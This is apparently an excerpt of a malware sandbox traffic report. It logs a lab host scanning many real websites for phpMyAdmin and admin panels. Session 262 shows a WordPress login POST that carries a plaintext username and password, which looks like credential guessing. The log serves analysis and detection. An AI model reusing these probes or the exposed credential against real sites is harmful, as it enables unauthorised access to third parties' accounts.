5c 75 30 30 37 42 30 Data Ascii: 2000alidator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0
2024-02-20 23:26:20 UTC	6	IN	Data Raw: 20 20 20 20 3c 6f Data Ascii: <o
2024-02-20 23:26:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:20 UTC	2379	IN	Data Raw: 39 33 38 0d 0a 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 73 22 3e 45 73 70 61 26 6e 74 69 6c 64 65 3b 6f 6c 20 2d 20 53 70 61 6e 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 73 76 22 3e 53 76 65 6e 73 6b 61 20 2d 20 53 77 65 64 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 74 72 22 3e 54 26 75 75 6d 6c 3b 72 6b 26 63 63 65 64 69 6c 3b 65 20 2d 20 54 75 72 6b 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 75 6b 22 Data Ascii: 938ption value="es">Español - Spanish</option> <option value="sv">Svenska - Swedish</option> <option value="tr">Türkçe - Turkish</option> <option value="uk"

Session ID	Source IP	Source Port	Destination IP	Destination Port
261	192.168.2.6	53665	185.39.146.199	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	172	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	781	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:19 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=1h5kao7faq45o3qf9tohkoiet2; expires=Fri, 10-Jun-2078 22:52:38 GMT; Max-Age=1713655579; path=/; secure; HttpOnly; SameSite=None location: https://www.markoren.no/PhpMyAdmin/ access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-length: 0 content-type: text/html; charset=iso-8859-1 x-backend: server2 x-type: customer x-varnish: 975993256 age: 0 x-server: varnish-2 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
262	192.168.2.6	53909	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	354	OUT	POST /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP+Cookie+check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://norwegischlernen.info/wp-login.php Content-Length: 161 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:19 UTC	161	OUT	Data Raw: 6c 6f 67 3d 6e 6f 63 69 70 79 25 34 30 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 26 70 77 64 3d 46 75 63 6b 6d 79 6c 69 66 65 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=nocipy%40norwegischlernen.info&pwd=Fuckmylife1&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fnorwegischlernen.info%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:19 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5650 date: Tue, 20 Feb 2024 23:26:19 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:19 UTC	5650	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
263	192.168.2.6	53896	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	179	OUT	GET /wp-login.php HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	446	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding X-Cache-Status: MISS X-Powered-By: PleskLin
2024-02-20 23:26:20 UTC	8725	IN	Data Raw: 31 63 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 53 65 20 63 6f 6e 6e 65 63 74 65 72 20 26 6c 73 61 71 75 6f 3b 20 44 72 20 44 6f 6e 20 50 69 65 72 72 65 20 4f 72 73 69 6e 69 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 Data Ascii: 1cf4<!DOCTYPE html><html lang="fr-FR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Se connecter &lsaquo; Dr Don Pierre Orsini — WordPress</title><meta name='robots' content='noindex, follow' /><link

Session ID	Source IP	Source Port	Destination IP	Destination Port
264	192.168.2.6	53994	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	165	OUT	GET /admin HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:19 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
265	192.168.2.6	54457	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	164	OUT	GET /pma HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	175	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/pma
2024-02-20 23:26:19 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
266	192.168.2.6	54116	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	171	OUT	GET /admin HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	220	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://www.stylesense.co.uk/admin
2024-02-20 23:26:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
267	192.168.2.6	54094	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	178	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	408	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.cabinet-orsika.fr/phpMyAdmin/ X-Cache-Status: MISS X-Powered-By: PleskLin

Session ID	Source IP	Source Port	Destination IP	Destination Port
268	192.168.2.6	54279	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	181	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	355	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mruul8ldluhskqv1trt26ro4uj; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: /
2024-02-20 23:26:19 UTC	11	IN	Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
269	192.168.2.6	54465	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	165	OUT	GET /admin HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:19 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
270	192.168.2.6	54728	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	167	OUT	GET /admin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_d9k1q36NU3wv6WV/dw8+anG07zEwYoIlWjxwq+mRf4lhEiuerYKd1Eq7poHDVCJIzxrciBmmjvTiOmX4YjgIxQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:19 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
271	192.168.2.6	55062	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	170	OUT	GET /admin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_JHDg6QpHID1SS81NuHm76j66t0+ejMaZuXsx7yyqq8Fa/au+v/EB4vEk4sj/0YZCKuQPk2nRa7/beaqcaowVrw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:19 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
272	192.168.2.6	54552	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:19 UTC	177	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:20 UTC	520	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:19 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/" X-TEC-API-VERSION: v1 X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/ X-TEC-API-ORIGIN: https://ksv-schwimmen.de Vary: User-Agent Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:20 UTC	7672	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 4b 53 56 20 4e 65 70 74 75 6e 20 31 38 38 39 Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Seite nicht gefunden – KSV Neptun 1889
2024-02-20 23:26:20 UTC	526	IN	Data Raw: 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 68 6f 76 65 72 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 66 6f 63 75 73 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d Data Ascii: e="radio"]:checked,input[type=reset],input[type="checkbox"]:checked,input[type="checkbox"]:hover:checked,input[type="checkbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:var(--ast-global-color-0);background-color:var(--ast-global-
2024-02-20 23:26:20 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:21 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b Data Ascii: 2000try-meta,.entry-meta {line-height:1.45;color:var(--ast-global-color-0);}.entry-meta a:not(.ast-button):hover,.entry-meta a:not(.ast-button):hover ,.entry-meta a:not(.ast-button):focus,.entry-meta a:not(.ast-button):focus *,.page-links > .page-link
2024-02-20 23:26:21 UTC	6	IN	Data Raw: 6c 69 6e 6b 2e 77 Data Ascii: link.w
2024-02-20 23:26:21 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
